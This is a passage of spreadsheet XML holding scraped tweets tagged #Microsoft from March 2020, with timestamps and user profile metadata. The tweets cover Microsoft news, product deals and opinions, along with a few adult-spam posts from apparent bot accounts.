    <t>Thu Mar 05 02:55:27 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Building a better future together
#Black History Month #Microsoft
https://t.co/3KnEbF3AWq</t>
  </si>
  <si>
    <t>Black History Month: Building a better future together
#Featured #Microsoft
https://t.co/3KnEbF3AWq</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:25 +0000 2020</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:24 +0000 2020</t>
  </si>
  <si>
    <t>U.S. Air Force and Microsoft partner to empower airmen with modern IT
#The Official Microsoft Blog #Microsoft
https://t.co/hFpf45rJPs</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft for Startups unlocks $1 billion in sales opportunities for B2B startups; adds GitHub and Microsoft Power Platform
#Featured #Microsoft
https://t.co/bVnRQcyB7l</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:21 +0000 2020</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:20 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Leaning In
#Black History Month #Microsoft
https://t.co/SkPzpqi2nr</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:19 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Leaning In
#Featured #Microsoft
https://t.co/SkPzpqi2nr</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:18 +0000 2020</t>
  </si>
  <si>
    <t>Delivering on the promise of security AI to help defenders protect todays hybrid environments
#RSA 2020 #Microsoft
https://t.co/GxGEKp9fIw</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:17 +0000 2020</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:16 +0000 2020</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:15 +0000 2020</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:14 +0000 2020</t>
  </si>
  <si>
    <t>Thu Mar 05 02:51:32 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Office Home and Business 2019 | 1 device, PC Key Card #2019 #Business #Card #Device #Home #Microsoft #office https://t.co/vOSn2yJdYI</t>
  </si>
  <si>
    <t>Thu Mar 05 02:51:00 +0000 2020</t>
  </si>
  <si>
    <t>Around the world, innovators and #entrepreneurs are finding new ways to harness technology to fuel purpose-driven social enterprises. Here's what Microsoft has been up to. https://t.co/3P7xLPOiHR #microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 02:50:04 +0000 2020</t>
  </si>
  <si>
    <t>Heres an idea: How about we not move production to another communist country.
#Coronavirus: #Apple, #Microsoft, #Google look to move #China #production https://t.co/x1AhMJr2ke</t>
  </si>
  <si>
    <t>{'id': 997924400862130177, 'id_str': '997924400862130177', 'name': 'ScottyJ', 'screen_name': 'Price_to_Value', 'location': '', 'description': 'Portfolio Manager | U.S. Equity | Small-Cap | Deep Value | FOIA | Infantry |Tweets â‰  Investment Advice | Aut viam inveniam aut faciam', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 610, 'friends_count': 1348, 'listed_count': 12, 'created_at': 'Sat May 19 19:38:12 +0000 2018', 'favourites_count': 23460, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3503, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1002947335444295680/get1Wugj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1002947335444295680/get1Wugj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/997924400862130177/1560318011',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</si>
  <si>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02:45:30 +0000 2020</t>
  </si>
  <si>
    <t>Oh boy... 
..
#Microsoft Teases New #Windows 10 Start Menu Without Live Tiles - ExtremeTech https://t.co/9IYt9xn1UM
#pc #technews</t>
  </si>
  <si>
    <t>{'id': 708826383925911552, 'id_str': '708826383925911552', 'name': 'G.E.T.', 'screen_name': 'GetwithGET', 'location': 'California, USA', 'description': 'We are gadget, electronics, and tech addicts. We live the tech life and keep up with the latest tech news and trends.', 'url': 'https://t.co/m2FelLMxa2', 'entities': {'url': {'urls': [{'url': 'https://t.co/m2FelLMxa2', 'expanded_url': 'https://gadgetselectronicstech.carrd.co/', 'display_url': 'gadgetselectronicstech.carrd.co', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 429, 'friends_count': 328, 'listed_count': 120, 'created_at': 'Sun Mar 13 01:25:54 +0000 2016', 'favourites_count': 563, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2569,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'http://pbs.twimg.com/profile_images/711832946727002112/o5I6qa2l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/711832946727002112/o5I6qa2l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/708826383925911552/1457845497',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</si>
  <si>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02:34:47 +0000 2020</t>
  </si>
  <si>
    <t>More evidence - Tough times for legacy tech vendors, and golden time for the Cloud https://t.co/GFfiMHywqq  #IBM #cloud #oracle #aws #google #ServiceNow #SAP #Microsoft #salesforce</t>
  </si>
  <si>
    <t>{'id': 20965826, 'id_str': '20965826', 'name': 'Phil Hassey', 'screen_name': 'PHassey', 'location': 'Sydney, Australia', 'description': "CEO capioIT | Advisor, Digital Devil's Advocate, Recovering Economist, Finder of Unintended Consequences #SaaS #Analytics #cloud #Innovation #digital #startup", 'url': 'https://t.co/OkNLLCvWnD', 'entities': {'url': {'urls': [{'url': 'https://t.co/OkNLLCvWnD', 'expanded_url': 'http://www.capioIT.com', 'display_url': 'capioIT.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3280, 'friends_count': 3470, 'listed_count': 388, 'created_at': 'Mon Feb 16 05:54:49 +0000 2009', 'favourites_count': 530, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9298,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'http://pbs.twimg.com/profile_images/595455136358535168/iOJiZAuu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/595455136358535168/iOJiZAuu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20965826/1401855212',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</si>
  <si>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02:34:43 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Machine Learning, Data Science and Deep Learning with Python #udemycoupon -&amp;gt; https://t.co/lKlGfmA2Fu
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Thu Mar 05 02:34:00 +0000 2020</t>
  </si>
  <si>
    <t>MONSTER HUNTER: WORLD - ICEBORNE MASTER EDITION [DELUXE]
Capcom - Xbox One
#Monsterhunter #capcom #xboxone #microsoft #playasia #affiliate #sale #weeklyspecial 
List price: US$ 91.99
Special price: US$ 19.99*
You save: US$ 72.00 (78%)
https://t.co/91oqoLe1Hb https://t.co/5DwNgTFsN4</t>
  </si>
  <si>
    <t>Thu Mar 05 02:33:31 +0000 2020</t>
  </si>
  <si>
    <t>I would like to be touched on my body #Billings   #star #microsoft https://t.co/pXCpCRxugF</t>
  </si>
  <si>
    <t>{'id': 1235322316734820352, 'id_str': '1235322316734820352', 'name': 'Tammy Taylor', 'screen_name': 'goconmocest', 'location': 'Mobile, USA', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 20, 'listed_count': 0, 'created_at': 'Wed Mar 04 21:52:52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'http://pbs.twimg.com/profile_images/1235324268990390273/t7pPcHQh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235324268990390273/t7pPcHQh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235322316734820352/1583359275',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</si>
  <si>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02:30:01 +0000 2020</t>
  </si>
  <si>
    <t>What The End Of Microsoft Windows 7 Means For Current Business Users , Read more on Global Banking &amp;amp; Finance Review. What the end of Microsoft Windows 7 means for current business users - Global Banking &amp;amp; Finance Review #microsoft #windows #business https://t.co/SIU3Vu32AO</t>
  </si>
  <si>
    <t>{'id': 964826293, 'id_str': '964826293', 'name': 'Global Banking &amp; Finance Review', 'screen_name': 'GBAFReview', 'location': 'Global', 'description': 'Official Twitter account of https://t.co/WdYIXt6YPA your guide to personal and professional financial success. Informing and inspiring', 'url': 'http://t.co/5FxlCKxz9z', 'entities': {'url': {'urls': [{'url': 'http://t.co/5FxlCKxz9z', 'expanded_url': 'http://www.globalbankingandfinance.com', 'display_url': 'globalbankingandfinance.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/WdYIXt6YPA', 'expanded_url': 'https://www.globalbankingandfinance.com', 'display_url': 'globalbankingandfinance.com', 'indices': [28, 51]}]}}, 'protected': False, 'followers_count': 12456, 'friends_count': 12484, 'listed_count': 130, 'created_at': 'Thu Nov 22 19:22:22 +0000 2012', 'favourites_count': 1052, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 32853, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5EFCE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/604270222170718209/1-3j6L9E_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/604270222170718209/1-3j6L9E_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/964826293/1531847829', 'profile_link_color': 'C40A0A', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '78C0A8', 'profile_text_color': '5E412F', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 02:30:00 +0000 2020</t>
  </si>
  <si>
    <t>My business do not generate data. Business intelligence is not for us. Is your business living this utopia? Know what you may be missing https://t.co/CWV8lB1chW 
#dataviz #dataanalytics #datavizlive #dataprivacy #dashboard #powerbi #microsoft https://t.co/CcV9vxbXm7</t>
  </si>
  <si>
    <t>{'id': 41790498, 'id_str': '41790498', 'name': 'Sushant Bharti', 'screen_name': 'bhartisushant', 'location': 'India', 'description': 'Co-Founder I Digital Entrepreneur | Digital Transformation | Biz Growth | ICO | Seeker at 366Pi Technologies,  366Pi Consulting', 'url': 'https://t.co/OvZGTMSbar', 'entities': {'url': {'urls': [{'url': 'https://t.co/OvZGTMSbar', 'expanded_url': 'https://366pi.com', 'display_url': '366pi.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3160, 'friends_count': 2806, 'listed_count': 426, 'created_at': 'Fri May 22 10:51:37 +0000 2009', 'favourites_count': 2398, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10424, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1A080A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1173498710195462144/sZ-J0w7e_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173498710195462144/sZ-J0w7e_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/41790498/1492858636', 'profile_link_color': '084B40', 'profile_sidebar_border_color': '4A403F', 'profile_sidebar_fill_color': '1A0D0B', 'profile_text_color': '968184', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 02:27:14 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus: #Apple, 
#Microsoft, #Google look to move #China production https://t.co/UMv4t32QtI #COVID19 #Business #Technology</t>
  </si>
  <si>
    <t>{'id': 2486176682, 'id_str': '2486176682', 'name': 'Price Healthcare', 'screen_name': 'PriceHealthcare', 'location': 'Texas, USA', 'description': 'Boutique Healthcare Consulting Firm, offering select Clients personalized attention: Employer-Coalitions, Payers, Pharma, etc. Tweets by Jandis Price, President', 'url': 'https://t.co/3WloXAkB0D', 'entities': {'url': {'urls': [{'url': 'https://t.co/3WloXAkB0D', 'expanded_url': 'http://www.pricehealthcareconsulting.com', 'display_url': 'pricehealthcareconsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1815, 'friends_count': 2489, 'listed_count': 270, 'created_at': 'Sat May 10 00:28:09 +0000 2014', 'favourites_count': 9016, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10515,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'http://pbs.twimg.com/profile_images/464925304868192256/PED4lDbs_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/464925304868192256/PED4lDbs_normal.jpeg',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</si>
  <si>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02:27:03 +0000 2020</t>
  </si>
  <si>
    <t>#Windows10 retro #PowerToys gets update: 100 bug fixes and even better #FancyZones Bug causing PowerToys crashes also released for the #opensource update of #Microsoft's 1990s power-user tool.</t>
  </si>
  <si>
    <t>{'id': 23732156, 'id_str': '23732156', 'name': 'Deepak Vora', 'screen_name': 'dpvora', 'location': "Tweets are personal views RT's", 'description': 'Information Technology Professional', 'url': 'http://t.co/eGGYqyIBmE', 'entities': {'url': {'urls': [{'url': 'http://t.co/eGGYqyIBmE', 'expanded_url': 'http://facebook.com/deepak.vora', 'display_url': 'facebook.com/deepak.vora', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 177, 'friends_count': 948, 'listed_count': 7, 'created_at': 'Wed Mar 11 06:36:46 +0000 2009', 'favourites_count': 1057, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10780,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'http://pbs.twimg.com/profile_images/822265632/DPVORA_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/822265632/DPVORA_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23732156/1352440823',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</si>
  <si>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Mar 05 02:25:38 +0000 2020</t>
  </si>
  <si>
    <t>@abu05 don't want this smoke. He remembers from years ago. #killerinstinct #XboxOne #xbox #Microsoft #GamePass #pc #PCGamer https://t.co/gPoJy3LFxh</t>
  </si>
  <si>
    <t>{'id': 908817666, 'id_str': '908817666', 'name': 'Eddie Martin', 'screen_name': 'martin71209', 'location': '', 'description': '#PCGamer ðŸ’»  /#XboxðŸŽ® :Squeaky7152 /  podcast: @geekfreakspod ðŸŽ™', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 117, 'friends_count': 237, 'listed_count': 12, 'created_at': 'Sat Oct 27 20:03:33 +0000 2012', 'favourites_count': 1370, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1336,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'http://pbs.twimg.com/profile_images/1190680851392151553/nuKexbnL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190680851392151553/nuKexbnL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/908817666/1430665500',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</si>
  <si>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02:24:12 +0000 2020</t>
  </si>
  <si>
    <t>I want you...
https://t.co/ltw0aPoTpM
#Waco
 #download #microsoft https://t.co/YUjDjzNkN1</t>
  </si>
  <si>
    <t>{'id': 1232091777886294016, 'id_str': '1232091777886294016', 'name': 'Marianna2353', 'screen_name': 'marianna2353', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Mon Feb 24 23:55:51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'http://pbs.twimg.com/profile_images/1232130806338007041/5zsnHve1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232130806338007041/5zsnHve1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1232091777886294016/1582597884',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</si>
  <si>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02:16:17 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/E6kmUqEAak 
User relationship DAX In Power BI - TAIK18 explained in the video link
#MICROSOFT #POWERBI #TAIK18 #DAX
 #USERRELATIONSHIP https://t.co/2ZSoCk6p8B</t>
  </si>
  <si>
    <t>{'id': 96478082, 'id_str': '96478082', 'name': 'Mohamme Adnan', 'screen_name': 'Mohammedadnant', 'location': 'à¤­à¤¾à¤°à¤¤', 'description': 'YouTuber By Passion for PowerBI..\nhttps://t.co/1aNnmSj0bu', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/1aNnmSj0bu', 'expanded_url': 'https://www.youtube.com/c/taik18', 'display_url': 'youtube.com/c/taik18', 'indices': [34, 57]}]}}, 'protected': False, 'followers_count': 4, 'friends_count': 27, 'listed_count': 0, 'created_at': 'Sun Dec 13 03:44:40 +0000 2009', 'favourites_count': 19, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1232126925637767168/h3E9bVom_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232126925637767168/h3E9bVom_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/96478082/1582597013',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</si>
  <si>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02:12:01 +0000 2020</t>
  </si>
  <si>
    <t>Another example of #Cisco and #Microsoft coming together to benefit the end users...  Seems like more and more big stuff happening in the #IoT space... https://t.co/f3AgETVCBo</t>
  </si>
  <si>
    <t>{'id': 122447251, 'id_str': '122447251', 'name': 'Chris Palermo', 'screen_name': 'chris_palermo', 'location': 'New Jersey', 'description': 'Global Cloud Collaboration Expert. Cisco employed. Cornell Univ educated. New Jersey bred. I preach enterprise collaboration. Tweets are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 502, 'friends_count': 348, 'listed_count': 23, 'created_at': 'Fri Mar 12 18:57:07 +0000 2010', 'favourites_count': 1747, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2140,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'http://pbs.twimg.com/profile_images/1220840417173950464/wgfry9kw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220840417173950464/wgfry9kw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/122447251/1570642945',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</si>
  <si>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02:08:04 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft: Microsoft recommends WA and CA employees WFH thru 3/21 due to COVID-19  $MSFT #Microsoft #Technology #Tech #MSFT #digitaltransformation https://t.co/62q2dbn8hl</t>
  </si>
  <si>
    <t>Thu Mar 05 02:04:36 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is taking its console war into the cloud ... https://t.co/Lv8fbMoipR https://t.co/y1G5wnKoFi</t>
  </si>
  <si>
    <t>{'id': 236925565, 'id_str': '236925565', 'name': 'Jonathon Brown', 'screen_name': 'Jon_R_Brown', 'location': 'Vancouver, British Columbia', 'description': 'Writer for @Stockhouse Publishing @CdnPress contributor. @VIUniversity &amp; @BCIT grad. jon.brown@stockhouse.com', 'url': 'https://t.co/ODJOOu2XJc', 'entities': {'url': {'urls': [{'url': 'https://t.co/ODJOOu2XJc', 'expanded_url': 'http://Stockhouse.com', 'display_url': 'Stockhouse.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1019, 'friends_count': 727, 'listed_count': 59, 'created_at': 'Tue Jan 11 17:43:36 +0000 2011', 'favourites_count': 6401, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5870,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'http://pbs.twimg.com/profile_images/754368749717913600/TOiWMP1w_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/754368749717913600/TOiWMP1w_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/236925565/1497897138', 'profile_link_color': '4A913C',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</si>
  <si>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02:03:09 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft to introduce a free tier of its Cosmos DB NoSQL database https://t.co/vOdPgPLO58 #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 02:00:02 +0000 2020</t>
  </si>
  <si>
    <t>Mount Sinai Hospital boosts #collaboration between more than 10,000 providers to improve care with #Microsoft #Azure - #DSRIP #HealthCare https://t.co/w0hFEJrefT #MSFTAdvocate</t>
  </si>
  <si>
    <t>Thu Mar 05 01:53:34 +0000 2020</t>
  </si>
  <si>
    <t>@Gartner's #MagicQuadrant, showed that @awscloud is the highest ranked leader in terms of both vision and ability to execute. #Gartner says that #AWS #AI outperforms #Google, #IBM and #Microsoft for #AI Developer Services. https://t.co/AkEw2yd6TN @DynamicCIO @Forbes</t>
  </si>
  <si>
    <t>Thu Mar 05 01:53:16 +0000 2020</t>
  </si>
  <si>
    <t>So excited about @WorkboardIncs  Native Integration with #Microsoft Azure DevOps Strengthens #OKR Offering for Enterprise Product Teams https://t.co/4Cb7wGq9lH</t>
  </si>
  <si>
    <t>{'id': 368711028, 'id_str': '368711028', 'name': 'Sameera', 'screen_name': 'sameeramoinpour', 'location': '', 'description': 'globetrotter, sports fan, foodie, @ucsc alum and strategy solutions @workboardinc', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 330, 'friends_count': 545, 'listed_count': 36, 'created_at': 'Tue Sep 06 03:00:55 +0000 2011', 'favourites_count': 6966, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5995, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/897181442072911873/prY-eW-X_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/897181442072911873/prY-eW-X_normal.jpg',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</si>
  <si>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01:51:28 +0000 2020</t>
  </si>
  <si>
    <t>Your kitty has already powdered her most intimate place and is waiting for indecent offers  #Frisco   #microsoft #jesus https://t.co/JioGvl524D</t>
  </si>
  <si>
    <t>{'id': 1235354888026103817, 'id_str': '1235354888026103817', 'name': 'April Clark', 'screen_name': 'smaneljiles', 'location': 'Portland, USA', 'description': 'Love comes unseen', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 20, 'listed_count': 0, 'created_at': 'Thu Mar 05 00:02:17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'http://pbs.twimg.com/profile_images/1235361153192259585/fVBMA_B-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235361153192259585/fVBMA_B-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235354888026103817/1583368054',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</si>
  <si>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01:45:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft recommends WA and CA employees WFH thru 3/21 due to COVID-19 : https://t.co/lrukqAHw7j #Microsoft Comments: https://t.co/lrukqAHw7j</t>
  </si>
  <si>
    <t>Thu Mar 05 01:40:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Edge #privacy settings to change right away https://t.co/P2ToWQz00u via @CNET</t>
  </si>
  <si>
    <t>Thu Mar 05 01:37:47 +0000 2020</t>
  </si>
  <si>
    <t>If you want my private snapchat you better check my website guys it's much more explicit there haha #Hollywood   #india #microsoft https://t.co/uhNKaWTsSD</t>
  </si>
  <si>
    <t>{'id': 1235351012363427840, 'id_str': '1235351012363427840', 'name': 'Unices Ferman', 'screen_name': 'thicymebeg', 'location': 'Baltimore, USA', 'description': 'It is not a lack of love, but a lack of friendship that makes unhappy marriages', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Wed Mar 04 23:46:52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'http://pbs.twimg.com/profile_images/1235376325713702912/hJHIYxxL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235376325713702912/hJHIYxxL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235351012363427840/1583371678',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</si>
  <si>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01:37:13 +0000 2020</t>
  </si>
  <si>
    <t>If you don't follow me on snapchat when what are you waiting for? 
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography #woodburning #pyrographyart #games #gamerguy... https://t.co/eyFHqVkxlK</t>
  </si>
  <si>
    <t>Thu Mar 05 01:36:05 +0000 2020</t>
  </si>
  <si>
    <t>Feeling the Microsoft Teams love care of Microsoft CSM Jonathan Wynn. Went out to grab the mail and nice package waiting for me.  #microftteams #microsoft #microsoftlife #swag https://t.co/c204u6aPa7</t>
  </si>
  <si>
    <t>Thu Mar 05 01:34:33 +0000 2020</t>
  </si>
  <si>
    <t>You need to try the new Microsoft Edge (based on Chromium)! So far amazing!
#microsoft https://t.co/Yq2Su7zims</t>
  </si>
  <si>
    <t>Thu Mar 05 01:32:50 +0000 2020</t>
  </si>
  <si>
    <t>Pleasingly productive time with the rockstar Microsoft AVS team.  Humbled to be able to share my experience with HCX, and to have the attention of this brainy crowd the last 2 days. 
#vmware #microsoft #azurevmwaresolutions #vmwarehcx #mobilityinnovation #bestoftimes https://t.co/fb2Ik2DGH0</t>
  </si>
  <si>
    <t>{'id': 117566111, 'id_str': '117566111', 'name': 'Gabe Rosas', 'screen_name': 'gabe_rosas', 'location': 'DFW, TX', 'description': 'Technical Product Manager for VMware HCX | vExpert | Dad x 6 | Psalm 144:1 | Tweets reflect personal opinions and views.', 'url': 'https://t.co/DkuDPvy0Hk', 'entities': {'url': {'urls': [{'url': 'https://t.co/DkuDPvy0Hk', 'expanded_url': 'https://hcx.design', 'display_url': 'hcx.design', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 361, 'friends_count': 355, 'listed_count': 14, 'created_at': 'Thu Feb 25 23:16:23 +0000 2010', 'favourites_count': 1053, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1685,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'http://pbs.twimg.com/profile_images/1190746084345335808/_By7wUl-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190746084345335808/_By7wUl-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/117566111/1542916224', 'profile_link_color': '3B94D9',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</si>
  <si>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01:31:48 +0000 2020</t>
  </si>
  <si>
    <t>Now that Microsoft Edge is built on Chromium, its super fast and a delight to use. Its my new daily driver! Well done #microsoft</t>
  </si>
  <si>
    <t>{'id': 139750354, 'id_str': '139750354', 'name': 'Alex Gurr', 'screen_name': 'alexgurr', 'location': 'Sydney, New South Wales', 'description': 'A twenty-something food-loving full stack JS Developer. Runner and fitness enthusiast who loves to build JavaScript thingymabobs. Head of Tech @ Shootsta', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 24, 'friends_count': 50, 'listed_count': 1, 'created_at': 'Mon May 03 15:25:06 +0000 2010', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1225908630274228225/UPz_OLM8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225908630274228225/UPz_OLM8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/139750354/1583372582',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</si>
  <si>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01:31:09 +0000 2020</t>
  </si>
  <si>
    <t>Download Microsoft SQL Server 2016 Free https://t.co/lZT6kNzzw0 via @YouTube #Microsoft #SQL #Server #SQLServer #SystemAdmin #Tech #Technology #IT</t>
  </si>
  <si>
    <t>Thu Mar 05 01:27:30 +0000 2020</t>
  </si>
  <si>
    <t>I want to have sex the way I want #Scottsdale   #microsoft #breaking https://t.co/EtSVxC7kOx</t>
  </si>
  <si>
    <t>{'id': 1235335367697534976, 'id_str': '1235335367697534976', 'name': 'Maryln Acosta', 'screen_name': 'forttopivent', 'location': 'Denver, USA', 'description': 'You may hold my hand for a while, but you hold my heart forever.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 28, 'listed_count': 0, 'created_at': 'Wed Mar 04 22:44:45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'http://pbs.twimg.com/profile_images/1235340552671023111/A0I42xIR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235340552671023111/A0I42xIR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235335367697534976/1583363149',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</si>
  <si>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01:26:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts new coronavirus plan: Seattle-area employees to work from home for next 3 weeks https://t.co/Gx7GogwJ47</t>
  </si>
  <si>
